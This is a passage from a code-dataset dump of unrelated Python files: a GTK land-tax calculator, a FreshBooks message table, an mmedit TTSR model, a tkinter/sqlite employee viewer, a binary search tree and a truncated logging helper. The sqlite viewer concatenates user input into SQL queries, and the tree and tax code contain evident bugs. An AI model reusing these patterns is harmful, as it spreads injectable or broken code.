apply_handlers(self):\n\t\tself.liststore.connect('row-changed', self.liststore_row_changed)\n\t\tself.wordpad.get_buffer().connect('changed', self.wordpad_buffer_changed)\n\n\n\n\tdef built_errors_dict(self):\n\t\tself.errors = {\n\t\t\t'IDVal'\t\t:\t'Incorrect \"ID\" value.\\n',\n\t\t\t'TypeVal'\t:\t'Incorrect \"Type\" value.\\n',\n\t\t\t'WidthVal'\t:\t'Incorrect \"Width\" value.\\n',\n\t\t\t'HeightsVal':\t'Incorrect \"Heights\" value.\\n'\n\t\t\t}\n\n\tdef error_show(self, msg):\n\t\terror_buffer = self.error.get_buffer()\n\t\teb_start = error_buffer.get_start_iter()\n\t\teb_end = error_buffer.get_end_iter()\n\t\ttext = error_buffer.get_text(eb_start, eb_end, True) + msg\n\n\t\tself.error.get_buffer().set_text(text)\n\t\tself.error_box.show_all()\n\n\tdef error_hide(self):\n\t\tself.error.get_buffer().set_text('')\n\t\tself.error_box.hide()\n\n\tdef str_to_int(self, str):\n\t\ttry:\n\t\t\tx = int(str)\n\n\t\t\tif not (-2147483648 <= x <= 2147483647):\n\t\t\t\tx = None\n\t\texcept ValueError:\n\t\t\tx = None\n\n\t\treturn x\n\n\n\n\tdef read_from_file(self, path):\n\t\tifile = open(path, 'r')\n\t\ttext = ifile.read()\n\t\tifile.close()\n\n\t\treturn text\n\n\tdef write_to_file(self, path, text):\n\t\tofile = open(path, 'w')\n\t\tofile.write(text)\n\t\tofile.close()\n\n\n\n\tdef refresh(self):\n\t\tself.refresh_wordpad()\n\t\tself.refresh_report()\n\n\tdef refresh_wordpad(self):\n\t\tif not ( self.wordpad.get_visible() ):\n\t\t\treturn\n\n\t\ttext = self.liststore_to_text()\n\t\tself.wordpad.get_buffer().set_text(text)\n\n\tdef refresh_report(self):\n\t\tif not ( self.report.get_visible() ):\n\t\t\treturn\n\n\t\ttext = self.report_gen()\n\t\tself.report.get_buffer().set_text(text)\n\n\tdef reparse_ssheet(self):\n\t\twordpad_buffer = self.wordpad.get_buffer()\n\t\twordpad_buffer_start = wordpad_buffer.get_start_iter()\n\t\twordpad_buffer_end = wordpad_buffer.get_end_iter()\n\n\t\ttext = wordpad_buffer.get_text(wordpad_buffer_start, wordpad_buffer_end, True)\n\n\t\tself.text_to_liststore(text)\n\n\t\tself.refresh_report()\n\n\n\n\tdef get_open_file_path(self):\n\t\tbuttons = (\n\t\t\tGtk.STOCK_CANCEL,\n\t\t\tGtk.ResponseType.CANCEL,\n\t\t\tGtk.STOCK_OPEN,\n\t\t\tGtk.ResponseType.OK\n\t\t\t)\n\n\t\tdialog = Gtk.FileChooserDialog('Open file...', self, Gtk.FileChooserAction.OPEN, buttons)\n\t\tdialog.set_select_multiple(False)\n\n\t\tfilters = [\n\t\t\tGtk.FileFilter(),\n\t\t\tGtk.FileFilter()\n\t\t\t]\n\t\tfilters[0].set_name('Text Files')\n\t\tfilters[0].add_mime_type('text/plain')\n\t\tfilters[1].set_name('Any Files')\n\t\tfilters[1].add_mime_type('*')\n\t\tfor i in filters:\n\t\t\tdialog.add_filter(i)\n\n\t\tresult = None\n\n\t\tresponce = dialog.run()\n\t\tif (responce == Gtk.ResponseType.OK):\n\t\t\tresult = dialog.get_filename()\n\n\t\tdialog.destroy()\n\n\t\treturn result\n\n\tdef get_save_file_path(self):\n\t\tbuttons = (\n\t\t\tGtk.STOCK_CANCEL,\n\t\t\tGtk.ResponseType.CANCEL,\n\t\t\tGtk.STOCK_SAVE,\n\t\t\tGtk.ResponseType.OK\n\t\t\t)\n\n\t\tdialog = Gtk.FileChooserDialog('Save file as...', self, Gtk.FileChooserAction.SAVE, buttons)\n\n\t\tfilters = [\n\t\t\tGtk.FileFilter(),\n\t\t\tGtk.FileFilter()\n\t\t\t]\n\t\tfilters[0].set_name('Text Files')\n\t\tfilters[0].add_mime_type('text/plain')\n\t\tfilters[1].set_name('Any Files')\n\t\tfilters[1].add_mime_type('*')\n\t\tfor i in filters:\n\t\t\tdialog.add_filter(i)\n\n\t\tresult = None\n\n\t\tresponce = dialog.run()\n\t\tif (responce == Gtk.ResponseType.OK):\n\t\t\tresult = dialog.get_filename()\n\n\t\tdialog.destroy()\n\n\t\treturn result\n\n\tdef unsaved_dialog(self):\n\t\tdialog = Gtk.Dialog(title = 'Unsaved changes!', parent = self)\n\n\t\tdialog.set_default_size(150, 100)\n\t\tdialog.set_resizable(False)\n\n\t\tlabel = Gtk.Label('Save changes to file before closing?')\n\t\tdialog.get_content_area().add(label)\n\n\t\tdialog.add_button(Gtk.STOCK_OK, Gtk.ResponseType.YES)\n\t\tdialog.add_button(Gtk.STOCK_NO, Gtk.ResponseType.NO)\n\t\tdialog.add_button(Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL)\n\n\t\tdialog.set_modal(True)\n\n\t\tdialog.show_all()\n\n\t\tresponse = dialog.run()\n\t\tdialog.destroy()\n\n\t\tif response == Gtk.ResponseType.YES:\n\t\t\treturn True\n\t\telif response == Gtk.ResponseType.NO:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn None\n\n\tdef about_dialog(self):\n\t\tdialog = Gtk.Dialog(title = 'About', parent = self)\n\n\t\tdialog.set_default_size(250, 200)\n\t\tdialog.set_resizable(False)\n\n\t\tdialog_box = Gtk.Box()\n\t\tdialog_box.set_orientation(Gtk.Orientation.VERTICAL)\n\t\tdialog.get_content_area().add(dialog_box)\n\n\t\tname = Gtk.Label('Land-tax Calculator')\n\t\tversion = Gtk.Label('Version: 1.0.0')\n\t\tauthor = Gtk.Label('Author:\\tRoman Titov')\n\n\t\tlogo = Gtk.Image()\n\t\tlogo.set_from_file('./res/about_logo.jpg')\n\n\t\tdialog_box.pack_start(name, False, False, 0)\n\t\tdialog_box.pack_start(version, False, False, 0)\n\t\tdialog_box.pack_start(logo, False, False, 0)\n\t\tdialog_box.pack_start(author, False, False, 0)\n\n\t\tdialog_box.show_all()\n\t\tdialog.run()\n\t\tdialog.destroy()\n\n\n\n\t# PARSERS:\n\tdef text_to_liststore(self, text):\n\t\tself.liststore.clear()\n\n\t\tregexp = '^.*[^ \\t\\n]+.*$'\n\t\tlines = re.findall(regexp, text, flags = re.M)\n\n\t\tsep = '[ \\t]+'\n\t\tnum = '([1-9][0-9]*)'\n\t\tregexp = '[ \\t]*' + num + sep + '([1-5])' + sep + num + sep + num + '[ \\t]*'\n\n\t\tfor i in range( len(lines) ):\n\t\t\terror_msg = 'Invalid source data, str ' + str(i) + '\\n'\t\t\t\n\n\t\t\tgroups = re.match(regexp, lines[i])\n\t\t\t\n\t\t\tif groups == None:\n\t\t\t\tself.error_show(error_msg)\n\t\t\t\tcontinue\n\n\t\t\tentries = []\n\t\t\tfor j in range(1, 5):\n\t\t\t\tentrie = groups.group(j)\n\t\t\t\tentrie = self.str_to_int(entrie)\n\n\t\t\t\tentries.append(entrie)\n\n\t\t\tif None in entries:\n\t\t\t\tself.error_show(error_msg)\n\t\t\t\tcontinue\t\t\t\t\n\n\t\t\tself.liststore.append(entries)\n\n\tdef liststore_to_text(self):\n\t\ttext = ''\n\n\t\tformat_str = '{0[0]:<15} {0[1]:<8} {0[2]:<10} {0[3]:<10}\\n'\n\t\tfor entries in self.liststore:\n\t\t\ttext += format_str.format(entries)\n\n\t\treturn text\n\n\tdef report_gen(self):\n\t\tif len(self.liststore) == 0:\n\t\t\treturn ''\n\n\t\ttaxes = [2.50, 2.98, 3.67, 4.61, 5.70]\n\n\t\ttext = ''\n\t\ttext += 'Отчёт: \\n\\n'\n\t\ttext += 'Участки: \\n'\n\n\t\tformat_str = '{0[0]:<30} {0[1]:<15} {0[2]:<15} {0[3]:<15}\\n'\n\n\t\theaders = ['Номер:', 'Площадь (М2):', 'Площадь (Га):', 'Налог:']\n\t\ttext += format_str.format(headers)\n\n\t\ttypes_nfo = []\n\t\tfor i in range(5):\n\t\t\ttypes_nfo.append([0, 0, 0, 0])\n\n\t\ttotal_square = 1\n\n\t\tfor entries in self.liststore:\n\t\t\tm2_square = entries[2] * entries[3]\n\t\t\tga_square = m2_square / 10000\n\t\t\tsumm = m2_square * taxes[entries[1] - 1]\n\n\t\t\ten_type_nfo = types_nfo[entries[1] - 1]\n\t\t\ten_type_nfo[0] += 1\n\t\t\ten_type_nfo[1] += m2_square\n\t\t\ten_type_nfo[2] += ga_square\n\t\t\ten_type_nfo[3] += summ\n\n\t\t\ttotal_square += m2_square\n\n\t\t\ttext += format_str.format([\n\t\t\t\tentries[0],\n\t\t\t\tm2_square,\n\t\t\t\tga_square,\n\t\t\t\tsumm\n\t\t\t\t])\n\n\t\ttext += '\\n'\n\n\t\tformat_str = '{0:<30} {1:<15}\\n'\n\n\t\tfor i in range( len(types_nfo) ):\n\t\t\ttype_nfo = types_nfo[i]\n\n\t\t\tif (type_nfo[0] == 0):\n\t\t\t\tcontinue\n\n\t\t\ttext += 'Тип #' + str(i) + '\\n'\n\t\t\ttext += format_str.format('Количество участков:', type_nfo[0])\n\t\t\ttext += format_str.format('Площадь участков (М2):', type_nfo[1])\n\t\t\ttext += format_str.format('Площадь участков (Га):', type_nfo[2])\n\t\t\ttext += format_str.format('Общая сумма налога:', type_nfo[3])\n\n\t\t\tpercent = (type_nfo[1] / total_square) * 100\n\t\t\ttext += format_str.format('Процент от общей площади:', percent)\n\t\t\t\n\t\t\ttext += '\\n'\n\n\t\treturn text\n\n\n\nwindow = ReWindow()\nwindow.connect(\"delete-event\", Gtk.main_quit)\n\nwindow.ssheet_box.show_all()\nwindow.edit_notebook.set_current_page(1)\n\nwindow.show_all()\nwindow.report_scroller.hide()\nwindow.error_box.hide()\n\nGtk.main()\n","sub_path":"Algorithms/Big Practice Task (Python)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"228333","text":"messages = {\n 'not_admin': 'Sorry, you must be a FreshBooks admin user to use this application',\n 'missing_url': 'Missing required field: url',\n 'missing_verifier': 'Missing required field: verifier',\n 'missing_field': 'Required field missing',\n 'unknown_system': 'Unknown System: %(system)s',\n}\n\ndef get_message(key, **kwargs):\n global messages\n if key not in messages:\n return 'Unknown Message'\n return messages[key] % kwargs\n","sub_path":"freshbooks/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135738587","text":"import numbers\nimport os.path as osp\n\nimport mmcv\nimport torch\n\nfrom mmedit.core import tensor2img\nfrom ..builder import build_backbone, build_component, build_loss\nfrom ..registry import MODELS\nfrom .basic_restorer import BasicRestorer\n\n\n@MODELS.register_module()\nclass TTSR(BasicRestorer):\n \"\"\"TTSR model for Reference-based Image Super-Resolution.\n\n Paper: Learning Texture Transformer Network for Image Super-Resolution.\n\n Args:\n generator (dict): Config for the generator.\n extractor (dict): Config for the extractor.\n transformer (dict): Config for the transformer.\n pixel_loss (dict): Config for the pixel loss.\n train_cfg (dict): Config for train. Default: None.\n test_cfg (dict): Config for testing. Default: None.\n pretrained (str): Path for pretrained model. Default: None.\n \"\"\"\n\n def __init__(self,\n generator,\n extractor,\n transformer,\n pixel_loss,\n train_cfg=None,\n test_cfg=None,\n pretrained=None):\n super(BasicRestorer, self).__init__()\n\n self.train_cfg = train_cfg\n self.test_cfg = test_cfg\n\n # model\n self.generator = build_backbone(generator)\n self.transformer = build_component(transformer)\n self.extractor = build_component(extractor)\n\n # loss\n self.pixel_loss = build_loss(pixel_loss)\n\n # pretrained\n self.init_weights(pretrained)\n\n def forward_dummy(self, lq, lq_up, ref, ref_downup, only_pred=True):\n \"\"\"Forward of networks.\n\n Args:\n lq (Tensor): LQ image.\n lq_up (Tensor): Upsampled LQ image.\n ref (Tensor): Reference image.\n ref_downup (Tensor): Image generated by sequentially applying\n bicubic down-sampling and up-sampling on reference image.\n only_pred (bool): Only return predicted results or not.\n Default: True.\n\n Returns:\n pred (Tensor): Predicted super-resolution results (n, 3, 4h, 4w).\n s (Tensor): Soft-Attention tensor with shape (n, 1, h, w).\n t_level3 (Tensor): Transformed HR texture T in level3.\n (n, 4c, h, w)\n t_level2 (Tensor): Transformed HR texture T in level2.\n (n, 2c, 2h, 2w)\n t_level1 (Tensor): Transformed HR texture T in level1.\n (n, c, 4h, 4w)\n \"\"\"\n\n _, _, lq_up_level3 = self.extractor(lq_up)\n _, _, ref_downup_level3 = self.extractor(ref_downup)\n ref_level1, ref_level2, ref_level3 = self.extractor(ref)\n\n s, t_level3, t_level2, t_level1 = self.transformer(\n lq_up_level3, ref_downup_level3, ref_level1, ref_level2,\n ref_level3)\n\n pred = self.generator(lq, s, t_level3, t_level2, t_level1)\n\n if only_pred:\n return pred\n return pred, s, t_level3, t_level2, t_level1\n\n def forward(self, lq, gt=None, test_mode=False, **kwargs):\n \"\"\"Forward function.\n\n Args:\n lq (Tensor): Input lq images.\n gt (Tensor): Ground-truth image. Default: None.\n test_mode (bool): Whether in test mode or not. Default: False.\n kwargs (dict): Other arguments.\n \"\"\"\n\n if test_mode:\n return self.forward_test(lq, gt=gt, **kwargs)\n\n return self.forward_dummy(lq, **kwargs)\n\n def train_step(self, data_batch, optimizer):\n \"\"\"Train step.\n\n Args:\n data_batch (dict): A batch of data, which requires\n 'lq', 'gt', 'lq_up', 'ref', 'ref_downup'\n optimizer (obj): Optimizer.\n\n Returns:\n dict: Returned output, which includes:\n log_vars, num_samples, results (lq, gt and pred).\n\n \"\"\"\n # data\n lq = data_batch['lq']\n lq_up = data_batch['lq_up']\n gt = data_batch['gt']\n ref = data_batch['ref']\n ref_downup = data_batch['ref_downup']\n\n # generate\n pred = self.forward_dummy(lq, lq_up, ref, ref_downup)\n\n # loss\n losses = dict()\n\n losses['loss_pix'] = self.pixel_loss(pred, gt)\n\n # parse loss\n loss, log_vars = self.parse_losses(losses)\n\n # optimize\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n log_vars.pop('loss') # remove the unnecessary 'loss'\n outputs = dict(\n log_vars=log_vars,\n num_samples=len(gt.data),\n results=dict(\n lq=lq.cpu(), gt=gt.cpu(), ref=ref.cpu(), output=pred.cpu()))\n\n return outputs\n\n def forward_test(self,\n lq,\n lq_up,\n ref,\n ref_downup,\n gt=None,\n meta=None,\n save_image=False,\n save_path=None,\n iteration=None):\n \"\"\"Testing forward function.\n\n Args:\n lq (Tensor): LQ image\n gt (Tensor): GT image\n lq_up (Tensor): Upsampled LQ image\n ref (Tensor): Reference image\n ref_downup (Tensor): Image generated by sequentially applying\n bicubic down-sampling and up-sampling on reference image\n meta (list[dict]): Meta data, such as path of GT file.\n Default: None.\n save_image (bool): Whether to save image. Default: False.\n save_path (str): Path to save image. Default: None.\n iteration (int): Iteration for the saving image name.\n Default: None.\n\n Returns:\n dict: Output results, which contain either key(s)\n 1. 'eval_result'.\n 2. 'lq', 'pred'.\n 3. 'lq', 'pred', 'gt'.\n \"\"\"\n\n # generator\n with torch.no_grad():\n pred = self.forward_dummy(\n lq=lq, lq_up=lq_up, ref=ref, ref_downup=ref_downup)\n\n pred = (pred + 1.) / 2.\n if gt is not None:\n gt = (gt + 1.) / 2.\n\n if self.test_cfg is not None and self.test_cfg.get('metrics', None):\n assert gt is not None, (\n 'evaluation with metrics must have gt images.')\n results = dict(eval_result=self.evaluate(pred, gt))\n else:\n results = dict(lq=lq.cpu(), output=pred.cpu())\n if gt is not None:\n results['gt'] = gt.cpu()\n\n # save image\n if save_image:\n if 'gt_path' in meta[0]:\n the_path = meta[0]['gt_path']\n else:\n the_path = meta[0]['lq_path']\n folder_name = osp.splitext(osp.basename(the_path))[0]\n if isinstance(iteration, numbers.Number):\n save_path = osp.join(save_path, folder_name,\n f'{folder_name}-{iteration + 1:06d}.png')\n elif iteration is None:\n save_path = osp.join(save_path, f'{folder_name}.png')\n else:\n raise ValueError('iteration should be number or None, '\n f'but got {type(iteration)}')\n mmcv.imwrite(tensor2img(pred), save_path)\n\n return results\n\n def init_weights(self, pretrained=None, strict=True):\n \"\"\"Init weights for models.\n\n Args:\n pretrained (str, optional): Path for pretrained weights. If given\n None, pretrained weights will not be loaded. Defaults to None.\n strict (boo, optional): Whether strictly load the pretrained model.\n Defaults to True.\n \"\"\"\n if isinstance(pretrained, str):\n if self.generator:\n self.generator.init_weights(pretrained, strict)\n if self.extractor:\n self.extractor.init_weights(pretrained, strict)\n if self.transformer:\n self.transformer.init_weights(pretrained, strict)\n elif pretrained is not None:\n raise TypeError('\"pretrained\" must be a str or None. '\n f'But received {type(pretrained)}.')\n","sub_path":"mmedit/models/restorers/ttsr.py","file_name":"ttsr.py","file_ext":"py","file_size_in_byte":8179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293652750","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom tkinter.filedialog import askopenfile \r\nimport time\r\nimport os\r\nimport sqlite3\r\nfrom io import BytesIO\r\n\r\ndef writeTofile(data, filename):\r\n # Convert binary data to proper format and write it on Hard Disk\r\n with open(filename, 'wb') as file:\r\n file.write(data)\r\n\r\ndef readBlobData():\r\n try:\r\n sqliteConnection = sqlite3.connect('__IAMRI__.db')\r\n cursor = sqliteConnection.cursor()\r\n\r\n cursor.execute(\"\"\"SELECT * from new_employee where Id =\"\"\"+dwonload_name_search.get())\r\n #cursor.execute(sql_fetch_blob_query, (dwonload_name_search.get(),))\r\n record = cursor.fetchall()\r\n for row in record:\r\n print(\"Id = \", row[0], \"Name = \", row[1])\r\n name = row[1]\r\n photo = row[2]\r\n resumeFile = row[3]\r\n\r\n print(\"Storing employee image and resume on disk \\n\")\r\n photoPath =name + \"001.jpeg\"\r\n resumePath =name + \"002.pdf\"\r\n writeTofile(photo, photoPath)\r\n writeTofile(resumeFile, resumePath)\r\n \r\n\r\n cursor.close()\r\n\r\n except sqlite3.Error as error:\r\n print(\"Failed to read blob data from sqlite table\", error)\r\n finally:\r\n if sqliteConnection:\r\n sqliteConnection.close()\r\n print(\"sqlite connection is closed\")\r\n\r\n#readBlobData('smith')\r\n#readBlobData(2)\r\n#fetting all data related to querry \r\ndef revert():\r\n sqliteConnection = sqlite3.connect('__IAMRI__.db')\r\n cursor = sqliteConnection.cursor()\r\n print(\"Connected to SQLite\")\r\n\r\n cursor.execute(\"\"\"SELECT * from new_employee where name like '%\"\"\"+name_search.get()+\"\"\"%'\"\"\")\r\n #cursor.execute(sql_fetch_blob_query, (name_search.get(),))\r\n list0=cursor.fetchall()\r\n cursor.close()\r\n sqliteConnection.close()\r\n output=''\r\n for x in list0:\r\n if type(x[0])==int:\r\n one=str(x[0])\r\n if type(x[2])==bytes:\r\n two=str(x[2])\r\n if type(x[3])==bytes:\r\n three=str(x[3])\r\n output=output+one+' '+x[1]+'\\n'\r\n return output\r\n\r\n status.set('Data Fetch sucessfully ☻☻☻')\r\n#creating a GUI window\r\nmaster=Tk()\r\nmaster.title(\"Employee Database create by Tarun kumar\")\r\nmaster.geometry(\"500x500\")\r\n\r\nname_search=StringVar()\r\nstatus=StringVar()\r\ndwonload_name_search=StringVar()\r\n#creating a label\r\nl1=Label(master,text=\"Employee Database\",font=(\"Arial Bold\",25))\r\nl1.grid(row=0,column=0,columnspan=2,sticky=W)\r\n\r\nl2=Label(master,text=\"Enter the name to search:\",font=(\"Arial Bold\",15))\r\nl2.grid(row=1,column=0)\r\n\r\n\r\n#creating text Box for better handeling for user\r\ntext=Text(master,width=50,height=10)\r\ntext.grid(row=7,columnspan=6) \r\n\r\nEntry(master,textvariable=name_search).grid(row=1,column=1)\r\nButton(master,text=\"Search\",command=lambda:text.insert(END,revert())).grid(row=3,columnspan=2)\r\nl3=Label(master,text=\"Looking for Dwonload\",font=(\"Arial Bold\",15))\r\nl3.grid(row=5,column=0)\r\nl4=Label(master,text=\"Search Result Are Shown on dwon :\",font=(\"Arial Bold\",10))\r\nl4.grid(row=4,column=0)\r\nButton(master,text=\"Dwonload\",command=lambda:readBlobData()).grid(row=6,columnspan=2)\r\nEntry(master,textvariable=dwonload_name_search).grid(row=5,column=1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmaster.mainloop()\r\n\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"82694918","text":"# -*- coding: utf-8 -*-\n\nfrom math import floor, ceil\n\nfrom odoo import models, fields, api\n\nHOURS_IN_A_DAY = 24\n\nclass CrmStage(models.Model):\n ######################\n # Private attributes #\n ######################\n _inherit = \"crm.stage\"\n \n ###################\n # Default methods #\n ###################\n def name_get(self):\n result = []\n for stage in self:\n name = stage.name + \" (\" + str(stage.average_duration_text) + \")\"\n result.append((stage.id, name))\n return result\n\n ######################\n # Fields declaration #\n ######################\n target_duration = fields.Float(string=\"Target Duration (Days)\")\n target_duration_text = fields.Char(string=\"Target Duration\",\n compute=\"_compute_target_duration_text\")\n average_duration = fields.Float(string=\"Average Duration (Days)\",\n compute=\"_compute_average_duration\")\n average_duration_text = fields.Char(string=\"Average Duration\",\n compute=\"_compute_average_duration\")\n is_last_stage = fields.Boolean(string=\"Is Last Stage\",\n compute=\"_compute_is_last_stage\")\n current_within = fields.Integer(string=\"Current Within Target\",\n compute=\"_compute_stats\")\n current_beyond = fields.Integer(string=\"Current Beyond Target\",\n compute=\"_compute_stats\")\n total_within = fields.Integer(string=\"Total Within Target\",\n compute=\"_compute_stats\")\n total_beyond = fields.Integer(string=\"Total Beyond Target\",\n compute=\"_compute_stats\")\n lead_ids = fields.One2many(string=\"Leads\",\n comodel_name=\"crm.lead\",\n inverse_name=\"stage_id\")\n log_ids = fields.One2many(string=\"Logs\",\n comodel_name=\"crm.lead.stage.log\",\n inverse_name=\"stage_id\")\n ##############################\n # Compute and search methods #\n ##############################\n @api.multi\n @api.depends(\"target_duration\")\n def _compute_target_duration_text(self):\n for stage in self:\n stage.target_duration_text = self.duration_to_text(stage.target_duration)\n \n @api.multi\n def _compute_average_duration(self):\n for stage in self:\n log_obj = self.env[\"crm.lead.stage.log\"]\n leads = self.env[\"crm.lead\"].search([('stage_id', '=', stage.id)])\n result = 0.0\n if leads:\n total = sum(l.duration_in_stage for l in leads)\n result = total / len(leads)\n stage.average_duration = result\n stage.average_duration_text = self.duration_to_text(result)\n\n @api.depends(\"team_id\")\n def _compute_is_last_stage(self):\n for stage in self:\n result = False\n stage_ids = stage.sudo().search([(\"team_id\",\"=\",stage.team_id.id)]).ids\n current_stage_index = stage_ids.index(stage.id)\n if current_stage_index == (len(stage_ids) - 1):\n result = True\n stage.is_last_stage = result\n \n @api.multi\n def _compute_stats(self):\n for stage in self:\n current_within = 0\n current_beyond = 0\n for lead in stage.lead_ids:\n if lead.duration_status == 'within':\n current_within += 1\n else:\n current_beyond += 1\n \n stage.current_within = current_within\n stage.current_beyond = current_beyond\n within = set()\n beyond = set()\n for log in stage.log_ids:\n if log.status == 'Within':\n within.add(log.lead_id.id)\n else:\n beyond.add(log.lead_id.id)\n \n new_set = within - beyond\n \n stage.total_within = len(new_set)\n stage.total_beyond = len(beyond)\n \n ############################\n # Constrains and onchanges #\n ############################\n\n #########################\n # CRUD method overrides #\n #########################\n\n ##################\n # Action methods #\n ##################\n\n ####################\n # Business methods #\n ####################\n def duration_to_text(self, duration):\n days = int(floor(duration))\n hours = int(ceil((duration % 1) * HOURS_IN_A_DAY))\n text = \"\"\n if days:\n text = \"{}D\".format(days)\n text += \"{}H\".format(hours)\n return text","sub_path":"lead_stage_duration/models/crm_stage.py","file_name":"crm_stage.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"375493670","text":"from collections import Sequence\nfrom enum import Enum\n\n\nclass BSTree(Sequence):\n def __init__(self):\n self.root = None\n self.count = 0\n self.traversal_mode = TraversalMode.LNR\n\n def __len__(self) -> int:\n return self.count\n\n def __getitem__(self, value):\n if isinstance(value, slice):\n raise IndexError('slice is not supported.')\n node = self.root\n while node is not None:\n if value < node.value:\n node = node.left\n continue\n if value > node.value:\n node = node.right\n continue\n break\n return node\n\n def __delitem__(self, value):\n self.remove_node(self.__getitem__(value))\n\n def __contains__(self, value) -> bool:\n return self.__getitem__(value) is not None\n\n def __iter__(self):\n if self.traversal_mode == TraversalMode.LNR:\n return LNRIterator(self.root)\n\n def __str__(self) -> str:\n return (str)(n.value for n in self.__iter__())\n\n def add(self, value):\n return self.add_node(BSTreeNode(value))\n\n def add_node(self, node):\n if self.root is None:\n self.root = node\n self.count += 1\n self.root.origin = self\n return node\n\n if node.parent is None:\n node.parent = self.root\n\n if node.value < node.parent.value:\n if node.parent.left is None:\n node.parent.left = node\n self.count += 1\n node.origin = self\n return node\n node.parent = node.parent.left\n return self.add_node(node)\n\n if node.value > node.parent.value:\n if node.parent.right is None:\n node.parent.right = node\n self.count += 1\n node.origin = self\n return node\n node.parent = node.parent.right\n return self.add_node(node)\n return None\n\n def remove_node(self, node):\n if node is None or node.origin != self:\n return None\n\n was_head = node == self.root\n\n if self.count == 1:\n self.root = None\n node.origin = None\n self.count -= 1\n return node\n\n if node.is_leaf():\n if node.is_left_child:\n node.parent.left = None\n else:\n node.parent.right = None\n\n node.origin = None\n node.parent = None\n return node\n\n if node.child_amout() == 1:\n if node.has_left_child:\n if was_head:\n self.root = node.left\n if node.is_left_child:\n node.parent.left = node.left\n else:\n node.parent.right = node.left\n return node\n if was_head:\n self.root = node.right\n if node.is_left_child:\n node.parent.left = node.right\n else:\n node.parent.right = node.right\n return node\n\n successor_node = node.Left\n while successor_node.right is not None:\n successor_node = successor_node.right\n node.value = successor_node.value\n self.remove_node(successor_node)\n return node\n\n\nclass BSTreeNode:\n def __init__(self, value):\n self.value = value\n self.right = None\n self.left = None\n self.parent = None\n self.origin = None\n\n def has_right_child(self):\n return self.right is not None\n\n def has_left_child(self):\n return self.left is not None\n\n def child_amout(self):\n a = 0\n if self.right is not None:\n a += 1\n if self.left is not None:\n a += 1\n return a\n\n def is_right_child(self):\n return self.parent is not None and self.parent.right == self\n\n def is_left_child(self):\n return self.parent is not None and self.parent.left == self\n\n def is_leaf(self):\n return self.left is None and self.right is None\n\n\nclass LNRIterator:\n def __init__(self, node):\n self.current = node\n\n def __iter__(self):\n while self.current is not None:\n\n if self.current.left is None:\n yield self.current.data\n self.current = self.current.right\n else:\n pre = self.current.left\n while pre.right is not None and pre.right is not self.current:\n pre = pre.right\n\n if pre.right is None:\n pre.right = self.current\n self.current = self.current.left\n\n else:\n pre.right = None\n yield self.current.data\n self.current = self.current.right\n\n\nclass TraversalMode(Enum):\n LNR = 1,\n NLR = 2,\n RNL = 3\n","sub_path":"src/data-structures/tree/binary-search-tree/bstree.py","file_name":"bstree.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"369594704","text":"\"\"\"\r\nProvides a simple facade over the standard python logging\r\n\"\"\"\r\nimport sys, traceback\r\nimport os\r\nimport time\r\nimport datetime\r\nimport logging\r\nimport logging\r\nimport logging.handlers\r\ntry:\r\n from StringIO import StringIO\r\nexcept ImportError:\r\n # Python 3.x\r\n from io import StringIO\r\n\r\nLOG_FILENAME = 'logs/debug.txt'\r\nmy_logger = None\r\n_CURR_FUNC = None\r\n\r\ndef DEBUG(msg,logger=None):\r\n global _CURR_FUNC\r\n cf = _currentFunction(1)\r\n if cf != _CURR_FUNC:\r\n _CURR_FUNC = cf\r\n my_logger.debug(\"In Function: {0}----------------\".format(cf))\r\n my_logger2.debug(msg)\r\n\r\ndef INFO(msg,logger=None):\r\n my_logger.info(msg)\r\n\r\ndef WARN(msg,logger=None):\r\n my_logger.warning(msg)\r\n\r\ndef ERROR(msg,logger=None):\r\n my_logger.error(msg)\r\n\r\n\r\ndef LOGFILE():\r\n return os.path.abspath(LOG_FILENAME)\r\n\r\ndef _getLastFunc(framePos = 0, numFrames = 1):\r\n \"\"\"Get the last function prior to the logging calls\"\"\"\r\n assert numFrames > 0, \"Invalid numFrames = {0}\".format(numFrames)\r\n stackList = traceback.extract_stack()\r\n l = len(stackList)\r\n stIndex = l-3-framePos\r\n if stIndex < 0:\r\n assert False, \"Stackframe {0} not available\".format(framePos)\r\n else:\r\n i = stIndex\r\n while i > -1:\r\n stFrame = stackList[i]\r\n i = i - 1\r\n yield stFrame\r\n numFrames = numFrames - 1\r\n if numFrames == 0:\r\n break\r\n return\r\n\r\ndef _currentFunction(framePos = 0):\r\n return list(_getLastFunc(framePos))[0][2]\r\n\r\ndef STACKTRACE(framePos = 0, numFrames = 1):\r\n output = StringIO()\r\n output.write(\"Stack Dump (most recent first):\\n\")\r\n i = framePos\r\n for fr in _getLastFunc(framePos, numFrames):\r\n output.write(\"\\t[{0}] - {1}\\n\".format(i,fr))\r\n i += 1\r\n DEBUG(output.getvalue())\r\n output.close()\r\n\r\ndef _secondsSinceMidnight():\r\n today = datetime.date.today()\r\n seconds_since_midnight = time.time() - time.mktime(today.timetuple())\r\n return seconds_since_midnight\r\n\r\nclass ContextFilter(logging.Filter):\r\n \"\"\"\r\n This is a filter which injects seconds since midnight into the log.\r\n \"\"\"\r\n def filter(self, record):\r\n record.SECS = _secondsSinceMidnight()\r\n return True\r\n\r\ndef getLoggerClearLog():\r\n global LOG_FILENAME, my_logger, my_logger2\r\n\r\n #formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\n # Next formatter needs the ContextFilter to insert the SECS attribute\r\n #formatter = logging.Formatter('%(SECS)s - %(name)s - %(levelname)s - 